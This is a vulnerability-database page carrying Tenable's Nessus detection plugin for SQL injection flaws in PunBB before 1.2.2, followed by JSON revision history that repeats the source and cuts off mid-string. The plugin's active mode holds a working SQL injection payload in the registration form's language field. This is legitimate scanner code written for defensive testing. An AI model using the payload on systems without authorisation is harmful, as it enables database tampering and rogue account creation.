Search...

PunBB < 1.2.2 Multiple Input Validation Vulnerabilities

2005-02-26T00:00:00

ID PUNBB_INPUT_VALIDATION_VULNS.NASL
Type nessus
Reporter Tenable
Modified 2018-11-15T00:00:00

Description

The remote host is running a version of PunBB that fails to properly sanitize user-input to several scripts thereby enabling an attacker to launch various SQL injection attacks.

In addition, the profile.php script enables anyone to call the change_pass action while specifying the id of an existing user to set their password to NULL, effectively shutting them out of the system.

                                        
                                            #
# (C) Tenable Network Security, Inc.
#

include("compat.inc");

if (description) {
  script_id(17224);
  script_version("1.22");

  script_cve_id("CVE-2005-0569", "CVE-2005-0570", "CVE-2005-0571");
  script_bugtraq_id(12652);

  script_name(english:"PunBB &lt; 1.2.2 Multiple Input Validation Vulnerabilities");
 
 script_set_attribute(attribute:"synopsis", value:
"The remote web server contains a PHP application that suffers from
multiple vulnerabilities." );
 script_set_attribute(attribute:"description", value:
"The remote host is running a version of PunBB that fails to properly
sanitize user-input to several scripts thereby enabling an attacker to
launch various SQL injection attacks.  

In addition, the profile.php script enables anyone to call the
change_pass action while specifying the id of an existing user to set
their password to NULL, effectively shutting them out of the system." );
 script_set_attribute(attribute:"see_also", value:"https://marc.info/?l=bugtraq&m=110927754230666&w=2" );
 script_set_attribute(attribute:"see_also", value:"http://forums.punbb.org/viewtopic.php?id=6460" );
 script_set_attribute(attribute:"solution", value:
"Upgrade to PunBB 1.2.2 or later." );
 script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P");
 script_set_cvss_temporal_vector("CVSS2#E:POC/RL:OF/RC:C");
 script_set_attribute(attribute:"exploitability_ease", value:"No exploit is required");
 script_set_attribute(attribute:"exploit_available", value:"false");
 script_set_attribute(attribute:"plugin_publication_date", value: "2005/02/26");
 script_set_attribute(attribute:"vuln_publication_date", value: "2005/02/24");
 script_cvs_date("Date: 2018/11/15 20:50:18");
 script_set_attribute(attribute:"plugin_type", value:"remote");
 script_end_attributes();
 
  summary["english"] = "Detects input validation vulnerabilities in PunBB";
  script_summary(english:summary["english"]);
 
  script_category(ACT_MIXED_ATTACK);
 
  script_copyright(english:"This script is Copyright (C) 2005-2018 Tenable Network Security, Inc.");

  script_family(english:"CGI abuses");

  script_dependencie("punBB_detect.nasl");
  script_exclude_keys("Settings/disable_cgi_scanning");
  script_require_ports("Services/www", 80);
  script_require_keys("www/punBB");
  exit(0);
}


include("global_settings.inc");
include("misc_func.inc");
include("http.inc");


port = get_http_port(default:80);
if (!can_host_php(port:port)) exit(0);


# Test an install.
install = get_kb_item(string("www/", port, "/punBB"));
if (isnull(install)) exit(0);
matches = eregmatch(string:install, pattern:"^(.+) under (/.*)$");
if (!isnull(matches)) {
  ver = matches[1];
  dir = matches[2];

  # If safe_checks are enabled, rely on the version number alone.
  if (safe_checks()) {
    if (
      # Either the version is 1.1.x - 1.2.1 or
      ereg(pattern:"^1\.(1|2$|2\.1([^0-9]|$))", string:ver) ||
      # the version is unknown and report paranoia is Paranoid.
      ("unknown" &gt;&lt; ver && report_paranoia == 2)
    ) {
      security_hole(port);
      set_kb_item(name: 'www/'+port+'/SQLInjection', value: TRUE);
      exit(0);
    }
  }
  # Otherwise, try to exploit it.
  else {
    # Specify a user / password to register. gettimeofday() serves
    # to avoid conflicts and have a (somewhat) random password.
    now = split(gettimeofday(), sep:".", keep:0);
    user = string("nessus", now[0]);
    pass = now[1];

    # Try to create a new user.
    url = "/register.php?action=register";
    bound = "bound";
    boundary = string("--", bound);
    postdata = string(
      boundary, "\r\n", 
      'Content-Disposition: form-data; name="form_sent"', "\r\n",
      "\r\n",
      "1\r\n",

      boundary, "\r\n", 
      'Content-Disposition: form-data; name="req_username"', "\r\n",
      "\r\n",
      user, "\r\n",

      boundary, "\r\n", 
      'Content-Disposition: form-data; name="req_password1"', "\r\n",
      "\r\n",
      "whatever\r\n",

      boundary, "\r\n", 
      'Content-Disposition: form-data; name="req_password2"', "\r\n",
      "\r\n",
      "whatever\r\n",

      boundary, "\r\n", 
      'Content-Disposition: form-data; name="req_email1"', "\r\n",
      "\r\n",
      user, "@example.com\r\n",

      boundary, "\r\n", 
      'Content-Disposition: form-data; name="language"', "\r\n",
      "\r\n",
      # nb: we're supplying values for language, style, registered, 
      #     registration_ip, and last_visit. A value of 0 for
      #     'registered' implies the user registered in 12/31/1969,
      #     which is the basis for our check below.
      "English','Oxygen',0,'0.0.0.0',0) -- \r\n",

      boundary, "--", "\r\n"
    );

    r = http_send_recv3(method: "POST",  item: dir + url, port: port,
      content_type: "multipart/form-data; boundary="+bound );
    if (isnull(r)) exit(0, "The web server did not answer");
    res = r[2];

    # Now check the User List for the user we just created.
    r = http_send_recv3(method:"GET", port:port,
      item:string(dir, "/userlist.php?username=", user, "&show_group=-1&sort_by=username&sort_dir=ASC&search=Submit") );
    if (isnull(r)) exit(0);
    res = r[2];

    # If they registered in 1969, there's a problem.
    if (egrep(pattern:'class="tcr"&gt;.*1969.*&lt;/td&gt;', string:res)) {
      rep  = string(
        "**** Nessus has successfully exploited this vulnerability by registering\n",
        "**** the user ", user, " to PunBB on the remote host;\n",
        "**** you may wish to remove it at your convenience.\n"
      );
      security_hole(port:port, extra: rep);
      set_kb_item(name: 'www/'+port+'/SQLInjection', value: TRUE);
      exit(0);
    }
  }
}

JSON Vulners Source

Initial Source

{"id": "PUNBB_INPUT_VALIDATION_VULNS.NASL", "bulletinFamily": "scanner", "title": "PunBB < 1.2.2 Multiple Input Validation Vulnerabilities", "description": "The remote host is running a version of PunBB that fails to properly sanitize user-input to several scripts thereby enabling an attacker to launch various SQL injection attacks. \n\nIn addition, the profile.php script enables anyone to call the change_pass action while specifying the id of an existing user to set their password to NULL, effectively shutting them out of the system.", "published": "2005-02-26T00:00:00", "modified": "2018-11-15T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://www.tenable.com/plugins/index.php?view=single&id=17224", "reporter": "Tenable", "references": ["https://marc.info/?l=bugtraq&m=110927754230666&w=2", "http://forums.punbb.org/viewtopic.php?id=6460"], "cvelist": ["CVE-2005-0570", "CVE-2005-0571", "CVE-2005-0569"], "type": "nessus", "lastseen": "2019-02-21T01:08:25", "history": [{"bulletin": {"bulletinFamily": "scanner", "cpe": [], "cvelist": ["CVE-2005-0570", "CVE-2005-0571", "CVE-2005-0569"], "cvss": {"score": 0.0, "vector": "NONE"}, "description": "The remote host is running a version of PunBB that fails to properly sanitize user-input to several scripts thereby enabling an attacker to launch various SQL injection attacks. \n\nIn addition, the profile.php script enables anyone to call the change_pass action while specifying the id of an existing user to set their password to NULL, effectively shutting them out of the system.", "edition": 3, "enchantments": {"score": {"value": 7.5, "vector": "NONE"}}, "hash": "8ac085a0578a14c6d7063e230d1086230eff1469860952f9bcd7c0997a482300", "hashmap": [{"hash": "8825cfcc6a68eb22807158b2fdce98f8", "key": "modified"}, {"hash": "9cf00d658b687f030ebe173a0528c567", "key": "reporter"}, {"hash": "26ad0cb788d040b30773b34abb68726b", "key": "href"}, {"hash": "5daaef6bf6c9f391360809e0473e4c11", "key": "title"}, {"hash": "57571165e0e6b3638078a5722a5ad8b0", "key": "published"}, {"hash": "d32c4adc3c3710247652ad4ec2f0a3ee", "key": "cvelist"}, {"hash": "6d07909b751422fd12fe13f9af53fb32", "key": "sourceData"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "6878789b51b9889de378c332ee256e56", "key": "description"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "5e0bd03bec244039678f2b955a2595aa", "key": "type"}, {"hash": "07948b8ff59e8dda0b01012f70f00327", "key": "naslFamily"}, {"hash": "d8e786d674ada58984bf0a2e32807381", "key": "pluginID"}, {"hash": "fa81631e91e8630740ed0c17ac5690c4", "key": "references"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe"}], "history": [], "href": "https://www.tenable.com/plugins/index.php?view=single&id=17224", "id": "PUNBB_INPUT_VALIDATION_VULNS.NASL", "lastseen": "2018-08-30T19:45:34", "modified": "2018-07-25T00:00:00", "naslFamily": "CGI abuses", "objectVersion": "1.3", "pluginID": "17224", "published": "2005-02-26T00:00:00", "references": ["http://marc.info/?l=bugtraq&m=110927754230666&w=2", "http://forums.punbb.org/viewtopic.php?id=6460"], "reporter": "Tenable", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description) {\n script_id(17224);\n script_version(\"1.21\");\n\n script_cve_id(\"CVE-2005-0569\", \"CVE-2005-0570\", \"CVE-2005-0571\");\n script_bugtraq_id(12652);\n\n script_name(english:\"PunBB < 1.2.2 Multiple Input Validation Vulnerabilities\");\n \n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web server contains a PHP application that suffers from\nmultiple vulnerabilities.\" );\n script_set_attribute(attribute:\"description\", value:\n\"The remote host is running a version of PunBB that fails to properly\nsanitize user-input to several scripts thereby enabling an attacker to\nlaunch various SQL injection attacks. \n\nIn addition, the profile.php script enables anyone to call the\nchange_pass action while specifying the id of an existing user to set\ntheir password to NULL, effectively shutting them out of the system.\" );\n script_set_attribute(attribute:\"see_also\", value:\"http://marc.info/?l=bugtraq&m=110927754230666&w=2\" );\n script_set_attribute(attribute:\"see_also\", value:\"http://forums.punbb.org/viewtopic.php?id=6460\" );\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to PunBB 1.2.2 or later.\" );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No exploit is required\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n script_set_attribute(attribute:\"plugin_publication_date\", value: \"2005/02/26\");\n script_set_attribute(attribute:\"vuln_publication_date\", value: \"2005/02/24\");\n script_cvs_date(\"Date: 2018/07/25 18:58:03\");\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_end_attributes();\n \n summary[\"english\"] = \"Detects input validation vulnerabilities in PunBB\";\n script_summary(english:summary[\"english\"]);\n \n script_category(ACT_MIXED_ATTACK);\n \n script_copyright(english:\"This script is Copyright (C) 2005-2018 Tenable Network Security, Inc.\");\n\n script_family(english:\"CGI abuses\");\n\n script_dependencie(\"punBB_detect.nasl\");\n script_exclude_keys(\"Settings/disable_cgi_scanning\");\n script_require_ports(\"Services/www\", 80);\n script_require_keys(\"www/punBB\");\n exit(0);\n}\n\n\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\n\n\nport = get_http_port(default:80);\nif (!can_host_php(port:port)) exit(0);\n\n\n# Test an install.\ninstall = get_kb_item(string(\"www/\", port, \"/punBB\"));\nif (isnull(install)) exit(0);\nmatches = eregmatch(string:install, pattern:\"^(.+) under (/.*)$\");\nif (!isnull(matches)) {\n ver = matches[1];\n dir = matches[2];\n\n # If safe_checks are enabled, rely on the version number alone.\n if (safe_checks()) {\n if (\n # Either the version is 1.1.x - 1.2.1 or\n ereg(pattern:\"^1\\.(1|2$|2\\.1([^0-9]|$))\", string:ver) ||\n # the version is unknown and report paranoia is Paranoid.\n (\"unknown\" >< ver && report_paranoia == 2)\n ) {\n security_hole(port);\n set_kb_item(name: 'www/'+port+'/SQLInjection', value: TRUE);\n exit(0);\n }\n }\n # Otherwise, try to exploit it.\n else {\n # Specify a user / password to register. gettimeofday() serves\n # to avoid conflicts and have a (somewhat) random password.\n now = split(gettimeofday(), sep:\".\", keep:0);\n user = string(\"nessus\", now[0]);\n pass = now[1];\n\n # Try to create a new user.\n url = \"/register.php?action=register\";\n bound = \"bound\";\n boundary = string(\"--\", bound);\n postdata = string(\n boundary, \"\\r\\n\", \n 'Content-Disposition: form-data; name=\"form_sent\"', \"\\r\\n\",\n \"\\r\\n\",\n \"1\\r\\n\",\n\n boundary, \"\\r\\n\", \n 'Content-Disposition: form-data; name=\"req_username\"', \"\\r\\n\",\n \"\\r\\n\",\n user, \"\\r\\n\",\n\n boundary, \"\\r\\n\", \n 'Content-Disposition: form-data; name=\"req_password1\"', \"\\r\\n\",\n \"\\r\\n\",\n \"whatever\\r\\n\",\n\n boundary, \"\\r\\n\", \n 'Content-Disposition: form-data; name=\"req_password2\"', \"\\r\\n\",\n \"\\r\\n\",\n \"whatever\\r\\n\",\n\n boundary, \"\\r\\n\", \n 'Content-Disposition: form-data; name=\"req_email1\"', \"\\r\\n\",\n \"\\r\\n\",\n user, \"@example.com\\r\\n\",\n\n boundary, \"\\r\\n\", \n 'Content-Disposition: form-data; name=\"language\"', \"\\r\\n\",\n \"\\r\\n\",\n # nb: we're supplying values for language, style, registered, \n # registration_ip, and last_visit. A value of 0 for\n # 'registered' implies the user registered in 12/31/1969,\n # which is the basis for our check below.\n \"English','Oxygen',0,'0.0.0.0',0) -- \\r\\n\",\n\n boundary, \"--\", \"\\r\\n\"\n );\n\n r = http_send_recv3(method: \"POST\", item: dir + url, port: port,\n content_type: \"multipart/form-data; boundary=\"+bound );\n if (isnull(r)) exit(0, \"The web server did not answer\");\n res = r[2];\n\n # Now check the User List for the user we just created.\n r = http_send_recv3(method:\"GET\", port:port,\n item:string(dir, \"/userlist.php?username=\", user, \"&show_group=-1&sort_by=username&sort_dir=ASC&search=Submit\") );\n if (isnull(r)) exit(0);\n res = r[2];\n\n # If they registered in 1969, there's a problem.\n if (egrep(pattern:'class=\"tcr\">.*1969.*</td>', string:res)) {\n rep = string(\n \"**** Nessus has successfully exploited this vulnerability by registering\\n\",\n \"**** the user \", user, \" to PunBB on the remote host;\\n\",\n \"**** you may wish to remove it at your convenience.\\n\"\n );\n security_hole(port:port, extra: rep);\n set_kb_item(name: 'www/'+port+'/SQLInjection', value: TRUE);\n exit(0);\n }\n }\n}\n", "title": "PunBB < 1.2.2 Multiple Input Validation Vulnerabilities", "type": "nessus", "viewCount": 1}, "differentElements": ["cvss"], "edition": 3, "lastseen": "2018-08-30T19:45:34"}, {"bulletin": {"bulletinFamily": "scanner", "cpe": [], "cvelist": ["CVE-2005-0570", "CVE-2005-0571", "CVE-2005-0569"], "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "description": "The remote host is running a version of PunBB that fails to properly sanitize user-input to several scripts thereby enabling an attacker to launch various SQL injection attacks. \n\nIn addition, the profile.php script enables anyone to call the change_pass action while specifying the id of an existing user to set their password to NULL, effectively shutting them out of the system.", "edition": 1, "enchantments": {"score": {"value": 7.5, "vector": "NONE"}}, "hash": "fcf4199b21b25f63c468ee5b8c71821cace6ecc4cffc1b89a02317d938c58255", "hashmap": [{"hash": "9cf00d658b687f030ebe173a0528c567", "key": "reporter"}, {"hash": "26ad0cb788d040b30773b34abb68726b", "key": "href"}, {"hash": "e5d275b3ebd62646b78320753699e02e", "key": "cvss"}, {"hash": "5daaef6bf6c9f391360809e0473e4c11", "key": "title"}, {"hash": "57571165e0e6b3638078a5722a5ad8b0", "key": "published"}, {"hash": "d32c4adc3c3710247652ad4ec2f0a3ee", "key": "cvelist"}, {"hash": "bca25220ee08a6cb89e95a141df15abb", "key": "sourceData"}, {"hash": "d08e79425bc71713795493550c27a5ca", "key": "modified"}, {"hash": "6878789b51b9889de378c332ee256e56", "key": "description"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "5e0bd03bec244039678f2b955a2595aa", "key": "type"}, {"hash": "07948b8ff59e8dda0b01012f70f00327", "key": "naslFamily"}, {"hash": "d8e786d674ada58984bf0a2e32807381", "key": "pluginID"}, {"hash": "fa81631e91e8630740ed0c17ac5690c4", "key": "references"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe"}], "history": [], "href": "https://www.tenable.com/plugins/index.php?view=single&id=17224", "id": "PUNBB_INPUT_VALIDATION_VULNS.NASL", "lastseen": "2016-09-26T17:25:05", "modified": "2011-03-14T00:00:00", "naslFamily": "CGI abuses", "objectVersion": "1.2", "pluginID": "17224", "published": "2005-02-26T00:00:00", "references": ["http://marc.info/?l=bugtraq&m=110927754230666&w=2", "http://forums.punbb.org/viewtopic.php?id=6460"], "reporter": "Tenable", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description) {\n script_id(17224);\n script_version(\"$Revision: 1.20 $\");\n\n script_cve_id(\"CVE-2005-0569\", \"CVE-2005-0570\", \"CVE-2005-0571\");\n script_bugtraq_id(12652);\n script_osvdb_id(14128, 14129, 14130, 14131, 14132);\n\n script_name(english:\"PunBB < 1.2.2 Multiple Input Validation Vulnerabilities\");\n \n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web server contains a PHP application that suffers from\nmultiple vulnerabilities.\" );\n script_set_attribute(attribute:\"description\", value:\n\"The remote host is running a version of PunBB that fails to properly\nsanitize user-input to several scripts thereby enabling an attacker to\nlaunch various SQL injection attacks. \n\nIn addition, the profile.php script enables anyone to call the\nchange_pass action while specifying the id of an existing user to set\ntheir password to NULL, effectively shutting them out of the system.\" );\n script_set_attribute(attribute:\"see_also\", value:\"http://marc.info/?l=bugtraq&m=110927754230666&w=2\" );\n script_set_attribute(attribute:\"see_also\", value:\"http://forums.punbb.org/viewtopic.php?id=6460\" );\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to PunBB 1.2.2 or later.\" );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No exploit is required\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"plugin_publication_date\", value: \"2005/02/26\");\n script_set_attribute(attribute:\"vuln_publication_date\", value: \"2005/02/24\");\n script_cvs_date(\"$Date: 2011/03/14 21:48:11 $\");\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_end_attributes();\n \n summary[\"english\"] = \"Detects input validation vulnerabilities in PunBB\";\n script_summary(english:summary[\"english\"]);\n \n script_category(ACT_MIXED_ATTACK);\n \n script_copyright(english:\"This script is Copyright (C) 2005-2011 Tenable Network Security, Inc.\");\n\n script_family(english:\"CGI abuses\");\n\n script_dependencie(\"punBB_detect.nasl\");\n script_exclude_keys(\"Settings/disable_cgi_scanning\");\n script_require_ports(\"Services/www\", 80);\n script_require_keys(\"www/punBB\");\n exit(0);\n}\n\n\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\n\n\nport = get_http_port(default:80);\nif (!can_host_php(port:port)) exit(0);\n\n\n# Test an install.\ninstall = get_kb_item(string(\"www/\", port, \"/punBB\"));\nif (isnull(install)) exit(0);\nmatches = eregmatch(string:install, pattern:\"^(.+) under (/.*)$\");\nif (!isnull(matches)) {\n ver = matches[1];\n dir = matches[2];\n\n # If safe_checks are enabled, rely on the version number alone.\n if (safe_checks()) {\n if (\n # Either the version is 1.1.x - 1.2.1 or\n ereg(pattern:\"^1\\.(1|2$|2\\.1([^0-9]|$))\", string:ver) ||\n # the version is unknown and report paranoia is Paranoid.\n (\"unknown\" >< ver && report_paranoia == 2)\n ) {\n security_hole(port);\n set_kb_item(name: 'www/'+port+'/SQLInjection', value: TRUE);\n exit(0);\n }\n }\n # Otherwise, try to exploit it.\n else {\n # Specify a user / password to register. gettimeofday() serves\n # to avoid conflicts and have a (somewhat) random password.\n now = split(gettimeofday(), sep:\".\", keep:0);\n user = string(\"nessus\", now[0]);\n pass = now[1];\n\n # Try to create a new user.\n url = \"/register.php?action=register\";\n bound = \"bound\";\n boundary = string(\"--\", bound);\n postdata = string(\n boundary, \"\\r\\n\", \n 'Content-Disposition: form-data; name=\"form_sent\"', \"\\r\\n\",\n \"\\r\\n\",\n \"1\\r\\n\",\n\n boundary, \"\\r\\n\", \n 'Content-Disposition: form-data; name=\"req_username\"', \"\\r\\n\",\n \"\\r\\n\",\n user, \"\\r\\n\",\n\n boundary, \"\\r\\n\", \n 'Content-Disposition: form-data; name=\"req_password1\"', \"\\r\\n\",\n \"\\r\\n\",\n \"whatever\\r\\n\",\n\n boundary, \"\\r\\n\", \n 'Content-Disposition: form-data; name=\"req_password2\"', \"\\r\\n\",\n \"\\r\\n\",\n \"whatever\\r\\n\",\n\n boundary, \"\\r\\n\", \n 'Content-Disposition: form-data; name=\"req_email1\"', \"\\r\\n\",\n \"\\r\\n\",\n user, \"@example.com\\r\\n\",\n\n boundary, \"\\r\\n\", \n 'Content-Disposition: form-data; name=\"language\"', \"\\r\\n\",\n \"\\r\\n\",\n # nb: we're supplying values for language, style, registered, \n # registration_ip, and last_visit. A value of 0 for\n # 'registered' implies the user registered in 12/31/1969,\n # which is the basis for our check below.\n \"English','Oxygen',0,'0.0.0.0',0) -- \\r\\n\",\n\n boundary, \"--\", \"\\r\\n\"\n );\n\n r = http_send_recv3(method: \"POST\", item: dir + url, port: port,\n content_type: \"multipart/form-data; boundary=\"+bound );\n if (isnull(r)) exit(0, \"The web server did not answer\");\n res = r[2];\n\n # Now check the User List for the user we just created.\n r = http_send_recv3(method:\"GET\", port:port,\n item:string(dir, \"/userlist.php?username=\", user, \"&show_group=-1&sort_by=username&sort_dir=ASC&search=Submit\") );\n if (isnull(r)) exit(0);\n res = r[2];\n\n # If they registered in 1969, there's a problem.\n if (egrep(pattern:'class=\"tcr\">.*1969.*</td>', string:res)) {\n rep = string(\n \"**** Nessus has successfully exploited this vulnerability by registering\\n\",\n \"**** the user \", user, \" to PunBB on the remote host;\\n\",\n \"**** you may wish to remove it at your convenience.\\n\"\n );\n security_hole(port:port, extra: rep);\n set_kb_item(name: 'www/'+port+'/SQLInjection', value: TRUE);\n exit(0);\n }\n }\n}\n", "title": "PunBB < 1.2.2 Multiple Input Validation Vulnerabilities", "type": "nessus", "viewCount": 1}, "differentElements": ["modified", "sourceData"], "edition": 1, "lastseen": "2016-09-26T17:25:05"}, {"bulletin": {"bulletinFamily": "scanner", "cpe": [], "cvelist": ["CVE-2005-0570", "CVE-2005-0571", "CVE-2005-0569"], "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "description": "The remote host is running a version of PunBB that fails to properly sanitize user-input to several scripts thereby enabling an attacker to launch various SQL injection attacks. \n\nIn addition, the profile.php script enables anyone to call the change_pass action while specifying the id of an existing user to set their password to NULL, effectively shutting them out of the system.", "edition": 2, "enchantments": {"score": {"value": 7.5, "vector": "NONE"}}, "hash": "3b746f91768f411c8b7bf9546e22ac45ceeb1befb10c001a5941ec0fd04ee135", "hashmap": [{"hash": "8825cfcc6a68eb22807158b2fdce98f8", "key": "modified"}, {"hash": "9cf00d658b687f030ebe173a0528c567", "key": "reporter"}, {"hash": "26ad0cb788d040b30773b34abb68726b", "key": "href"}, {"hash": "e5d275b3ebd62646b78320753699e02e", "key": "cvss"}, {"hash": "5daaef6bf6c9f391360809e0473e4c11", "key": "title"}, {"hash": "57571165e0e6b3638078a5722a5ad8b0", "key": "published"}, {"hash": "d32c4adc3c3710247652ad4ec2f0a3ee", "key": "cvelist"}, {"hash": "6d07909b751422fd12fe13f9af53fb32", "key": "sourceData"}, {"hash": "6878789b51b9889de378c332ee256e56", "key": "description"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "5e0bd03bec244039678f2b955a2595aa", "key": "type"}, {"hash": "07948b8ff59e8dda0b01012f70f00327", "key": "naslFamily"}, {"hash": "d8e786d674ada58984bf0a2e32807381", "key": "pluginID"}, {"hash": "fa81631e91e8630740ed0c17ac5690c4", "key": "references"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe"}], "history": [], "href": "https://www.tenable.com/plugins/index.php?view=single&id=17224", "id": "PUNBB_INPUT_VALIDATION_VULNS.NASL", "lastseen": "2018-07-30T14:01:43", "modified": "2018-07-25T00:00:00", "naslFamily": "CGI abuses", "objectVersion": "1.3", "pluginID": "17224", "published": "2005-02-26T00:00:00", "references": ["http://marc.info/?l=bugtraq&m=110927754230666&w=2", "http://forums.punbb.org/viewtopic.php?id=6460"], "reporter": "Tenable", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description) {\n script_id(17224);\n script_version(\"1.21\");\n\n script_cve_id(\"CVE-2005-0569\", \"CVE-2005-0570\", \"CVE-2005-0571\");\n script_bugtraq_id(12652);\n\n script_name(english:\"PunBB < 1.2.2 Multiple Input Validation Vulnerabilities\");\n \n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web server contains a PHP application that suffers from\nmultiple vulnerabilities.\" );\n script_set_attribute(attribute:\"description\", value:\n\"The remote host is running a version of PunBB that fails to properly\nsanitize user-input to several scripts thereby enabling an attacker to\nlaunch various SQL injection attacks. \n\nIn addition, the profile.php script enables anyone to call the\nchange_pass action while specifying the id of an existing user to set\ntheir password to NULL, effectively shutting them out of the system.\" );\n script_set_attribute(attribute:\"see_also\", value:\"http://marc.info/?l=bugtraq&m=110927754230666&w=2\" );\n script_set_attribute(attribute:\"see_also\", value:\"http://forums.punbb.org/viewtopic.php?id=6460\" );\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to PunBB 1.2.2 or later.\" );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No exploit is required\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n script_set_attribute(attribute:\"plugin_publication_date\", value: \"2005/02/26\");\n script_set_attribute(attribute:\"vuln_publication_date\", value: \"2005/02/24\");\n script_cvs_date(\"Date: 2018/07/25 18:58:03\");\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_end_attributes();\n \n summary[\"english\"] = \"Detects input validation vulnerabilities in PunBB\";\n script_summary(english:summary[\"english\"]);\n \n script_category(ACT_MIXED_ATTACK);\n \n script_copyright(english:\"This script is Copyright (C) 2005-2018 Tenable Network Security, Inc.\");\n\n script_family(english:\"CGI abuses\");\n\n script_dependencie(\"punBB_detect.nasl\");\n script_exclude_keys(\"Settings/disable_cgi_scanning\");\n script_require_ports(\"Services/www\", 80);\n script_require_keys(\"www/punBB\");\n exit(0);\n}\n\n\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\n\n\nport = get_http_port(default:80);\nif (!can_host_php(port:port)) exit(0);\n\n\n# Test an install.\ninstall = get_kb_item(string(\"www/\", port, \"/punBB\"));\nif (isnull(install)) exit(0);\nmatches = eregmatch(string:install, pattern:\"^(.+) under (/.*)$\");\nif (!isnull(matches)) {\n ver = matches[1];\n dir = matches[2];\n\n # If safe_checks are enabled, rely on the version number alone.\n if (safe_checks()) {\n if (\n # Either the version is 1.1.x - 1.2.1 or\n ereg(pattern:\"^1\\.(1|2$|2\\.1([^0-9]|$))\", string:ver) ||\n # the version is unknown and report paranoia is Paranoid.\n (\"unknown\" >< ver && report_paranoia == 2)\n ) {\n security_hole(port);\n set_kb_item(name: 'www/'+port+'/SQLInjection', value: TRUE);\n exit(0);\n }\n }\n # Otherwise, try to exploit it.\n else {\n # Specify a user / password to register. gettimeofday() serves\n # to avoid conflicts and have a (somewhat) random password.\n now = split(gettimeofday(), sep:\".\", keep:0);\n user = string(\"nessus\", now[0]);\n pass = now[1];\n\n # Try to create a new user.\n url = \"/register.php?action=register\";\n bound = \"bound\";\n boundary = string(\"--\", bound);\n postdata = string(\n boundary, \"\\r\\n\", \n 'Content-Disposition: form-data; name=\"form_sent\"', \"\\r\\n\",\n \"\\r\\n\",\n \"1\\r\\n\",\n\n boundary, \"\\r\\n\", \n 'Content-Disposition: form-data; name=\"req_username\"', \"\\r\\n\",\n \"\\r\\n\",\n user, \"\\r\\n\",\n\n boundary, \"\\r\\n\", \n 'Content-Disposition: form-data; name=\"req_password1\"', \"\\r\\n\",\n \"\\r\\n\",\n \"whatever\\r\\n\",\n\n boundary, \"\\r\\n\", \n 'Content-Disposition: form-data; name=\"req_password2\"', \"\\r\\n\",\n \"\\r\\n\",\n \"whatever\\r\\n\",\n\n boundary, \"\\r\\n\", \n 'Content-Disposition: form-data; name=\"req_email1\"', \"\\r\\n\",\n \"\\r\\n\",\n user, \"@example.com\\r\\n\",\n\n boundary, \"\\r\\n\", \n 'Content-Disposition: form-data; name=\"language\"', \"\\r\\n\",\n \"\\r\\n\",\n # nb: we're supplying values for language, style, registered, \n # registration_ip, and last_visit. A value of 0 for\n # 'registered' implies the user registered in 12/31/1969,\n # which is the basis for our check below.\n \"English','Oxygen',0,'0.0.0.0',0) -- \\r\\n\",\n\n boundary, \"--\", \"\\r\\n\"\n );\n\n r = http_send_recv3(method: \"POST\", item: dir + url, port: port,\n content_type: \"multipart/form-data; boundary=\"+bound );\n if (isnull(r)) exit(0, \"The web server did not answer\");\n res = r[2];\n\n # Now check the User List for the user we just created.\n r = http_send_recv3(method:\"GET\", port:port,\n item:string(dir, \"/userlist.php?username=\", user, \"&show_group=-1&sort_by=username&sort_dir=ASC&search=Submit\") );\n if (isnull(r)) exit(0);\n res = r[2];\n\n # If they registered in 1969, there's a problem.\n if (egrep(pattern:'class=\"tcr\">.*1969.*</td>', string:res)) {\n rep = string(\n \"**** Nessus has successfully exploited this vulnerability by 